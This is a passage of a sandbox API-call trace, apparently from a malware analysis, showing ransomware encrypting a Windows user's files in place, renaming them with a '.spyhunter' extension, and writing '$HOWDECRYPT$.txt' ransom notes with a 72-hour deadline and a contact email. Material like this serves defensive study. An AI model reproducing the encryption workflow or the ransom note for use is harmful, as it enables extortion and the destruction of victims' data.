[0156.211] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl") returned 138 [0156.211] StrStrW (lpFirst="04_Music_played_in_the_last_month.wpl", lpSrch=".txt") returned 0x0 [0156.211] GetProcessHeap () returned 0x2c0000 [0156.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0156.211] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eca4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248eca4*=0x504, lpOverlapped=0x0) returned 1 [0156.241] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffafc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.241] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x504, lpNumberOfBytesWritten=0x248eca4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248eca4*=0x504, lpOverlapped=0x0) returned 1 [0156.242] GetProcessHeap () returned 0x2c0000 [0156.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0156.242] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.242] WriteFile (in: hFile=0x9c, lpBuffer=0x248ece4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eca4, lpOverlapped=0x0 | out: lpBuffer=0x248ece4*, lpNumberOfBytesWritten=0x248eca4*=0x4, lpOverlapped=0x0) returned 1 [0156.242] WriteFile (in: hFile=0x9c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eca4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248eca4*=0x30, lpOverlapped=0x0) returned 1 [0156.242] CloseHandle (hObject=0x9c) returned 1 [0156.242] GetProcessHeap () returned 0x2c0000 [0156.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.242] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl.spyhunter") returned 148 [0156.242] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\04_music_played_in_the_last_month.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\04_music_played_in_the_last_month.wpl.spyhunter")) returned 1 [0156.243] GetProcessHeap () returned 0x2c0000 [0156.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.243] GetProcessHeap () returned 0x2c0000 [0156.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0156.243] GetProcessHeap () returned 0x2c0000 [0156.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc9778 | out: hHeap=0x2c0000) returned 1 [0156.243] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ece0 | out: pbBuffer=0x248ece0) returned 1 [0156.243] GetProcessHeap () returned 0x2c0000 [0156.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0156.243] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248ecd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248ecd8*=0x30) returned 1 [0156.243] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.244] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb") returned 95 [0156.244] StrStrW (lpFirst="CurrentDatabase_372.wmdb", lpSrch=".txt") returned 0x0 [0156.244] GetProcessHeap () returned 0x2c0000 [0156.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0156.244] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ec9c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ec9c*=0x2800, lpOverlapped=0x0) returned 1 [0156.257] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.257] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ec9c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ec9c*=0x2800, lpOverlapped=0x0) returned 1 [0156.257] GetProcessHeap () returned 0x2c0000 [0156.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0156.257] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.257] WriteFile (in: hFile=0x9c, lpBuffer=0x248ecdc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ec9c, lpOverlapped=0x0 | out: lpBuffer=0x248ecdc*, lpNumberOfBytesWritten=0x248ec9c*=0x4, lpOverlapped=0x0) returned 1 [0156.258] WriteFile (in: hFile=0x9c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ec9c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248ec9c*=0x30, lpOverlapped=0x0) returned 1 [0156.258] CloseHandle (hObject=0x9c) returned 1 [0156.259] GetProcessHeap () returned 0x2c0000 [0156.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.259] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb.spyhunter") returned 105 [0156.259] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb.spyhunter")) returned 1 [0156.259] GetProcessHeap () returned 0x2c0000 [0156.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.259] GetProcessHeap () returned 0x2c0000 [0156.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0156.260] GetProcessHeap () returned 0x2c0000 [0156.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4c0c0 | out: hHeap=0x2c0000) returned 1 [0156.260] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ece0 | out: pbBuffer=0x248ece0) returned 1 [0156.261] GetProcessHeap () returned 0x2c0000 [0156.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0156.261] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248ecd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248ecd8*=0x30) returned 1 [0156.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{4bd650f0-c8f9-11e7-b5bf-c43dc7584a00}.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.262] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat") returned 139 [0156.262] StrStrW (lpFirst="{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpSrch=".txt") returned 0x0 [0156.262] GetProcessHeap () returned 0x2c0000 [0156.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0156.262] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ec9c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ec9c*=0x1200, lpOverlapped=0x0) returned 1 [0156.286] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.286] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x248ec9c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ec9c*=0x1200, lpOverlapped=0x0) returned 1 [0156.286] GetProcessHeap () returned 0x2c0000 [0156.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0156.286] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.286] WriteFile (in: hFile=0x9c, lpBuffer=0x248ecdc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ec9c, lpOverlapped=0x0 | out: lpBuffer=0x248ecdc*, lpNumberOfBytesWritten=0x248ec9c*=0x4, lpOverlapped=0x0) returned 1 [0156.286] WriteFile (in: hFile=0x9c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ec9c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248ec9c*=0x30, lpOverlapped=0x0) returned 1 [0156.286] CloseHandle (hObject=0x9c) returned 1 [0156.287] GetProcessHeap () returned 0x2c0000 [0156.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.287] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat.spyhunter") returned 149 [0156.287] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{4bd650f0-c8f9-11e7-b5bf-c43dc7584a00}.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{4bd650f0-c8f9-11e7-b5bf-c43dc7584a00}.dat.spyhunter")) returned 1 [0156.288] GetProcessHeap () returned 0x2c0000 [0156.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.288] GetProcessHeap () returned 0x2c0000 [0156.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0156.288] GetProcessHeap () returned 0x2c0000 [0156.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f26580 | out: hHeap=0x2c0000) returned 1 [0156.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\owlvmzrc\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.352] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.352] WriteFile (in: hFile=0x9c, lpBuffer=0x248ec0f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ed38, lpOverlapped=0x0 | out: lpBuffer=0x248ec0f*, lpNumberOfBytesWritten=0x248ed38*=0x127, lpOverlapped=0x0) returned 1 [0156.353] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.353] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ed38, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ed38*=0x2ac, lpOverlapped=0x0) returned 1 [0156.353] CloseHandle (hObject=0x9c) returned 1 [0156.353] GetProcessHeap () returned 0x2c0000 [0156.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbc3c8 | out: hHeap=0x2c0000) returned 1 [0156.353] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ecd8 | out: pbBuffer=0x248ecd8) returned 1 [0156.353] GetProcessHeap () returned 0x2c0000 [0156.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0156.353] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ecd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ecd0*=0x30) returned 1 [0156.353] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.393] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]") returned 88 [0156.393] StrStrW (lpFirst="fwlink[1]", lpSrch=".txt") returned 0x0 [0156.393] GetProcessHeap () returned 0x2c0000 [0156.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0156.393] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ec94, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ec94*=0x0, lpOverlapped=0x0) returned 1 [0156.393] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.394] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x248ec94, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ec94*=0x0, lpOverlapped=0x0) returned 1 [0156.394] GetProcessHeap () returned 0x2c0000 [0156.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0156.394] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.394] WriteFile (in: hFile=0x178, lpBuffer=0x248ecd4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ec94, lpOverlapped=0x0 | out: lpBuffer=0x248ecd4*, lpNumberOfBytesWritten=0x248ec94*=0x4, lpOverlapped=0x0) returned 1 [0156.395] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ec94, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ec94*=0x30, lpOverlapped=0x0) returned 1 [0156.395] CloseHandle (hObject=0x178) returned 1 [0156.395] GetProcessHeap () returned 0x2c0000 [0156.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.395] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1].spyhunter") returned 98 [0156.395] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\fwlink[1]"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1].spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\fwlink[1].spyhunter")) returned 1 [0156.396] GetProcessHeap () returned 0x2c0000 [0156.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.396] GetProcessHeap () returned 0x2c0000 [0156.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0156.396] GetProcessHeap () returned 0x2c0000 [0156.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f45528 | out: hHeap=0x2c0000) returned 1 [0156.396] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.397] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.397] WriteFile (in: hFile=0x178, lpBuffer=0x248ec07*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ed30, lpOverlapped=0x0 | out: lpBuffer=0x248ec07*, lpNumberOfBytesWritten=0x248ed30*=0x127, lpOverlapped=0x0) returned 1 [0156.398] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.398] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ed30, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ed30*=0x2ac, lpOverlapped=0x0) returned 1 [0156.398] CloseHandle (hObject=0x178) returned 1 [0156.398] GetProcessHeap () returned 0x2c0000 [0156.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4b460 | out: hHeap=0x2c0000) returned 1 [0156.398] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ecd0 | out: pbBuffer=0x248ecd0) returned 1 [0156.399] GetProcessHeap () returned 0x2c0000 [0156.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0156.399] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ecc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ecc8*=0x30) returned 1 [0156.399] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.399] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]") returned 88 [0156.399] StrStrW (lpFirst="fwlink[1]", lpSrch=".txt") returned 0x0 [0156.399] GetProcessHeap () returned 0x2c0000 [0156.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0156.399] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ec8c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ec8c*=0x0, lpOverlapped=0x0) returned 1 [0156.399] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.400] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x248ec8c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ec8c*=0x0, lpOverlapped=0x0) returned 1 [0156.400] GetProcessHeap () returned 0x2c0000 [0156.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0156.400] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.400] WriteFile (in: hFile=0x178, lpBuffer=0x248eccc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ec8c, lpOverlapped=0x0 | out: lpBuffer=0x248eccc*, lpNumberOfBytesWritten=0x248ec8c*=0x4, lpOverlapped=0x0) returned 1 [0156.465] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ec8c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ec8c*=0x30, lpOverlapped=0x0) returned 1 [0156.465] CloseHandle (hObject=0x178) returned 1 [0156.478] GetProcessHeap () returned 0x2c0000 [0156.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.478] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1].spyhunter") returned 98 [0156.478] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]" 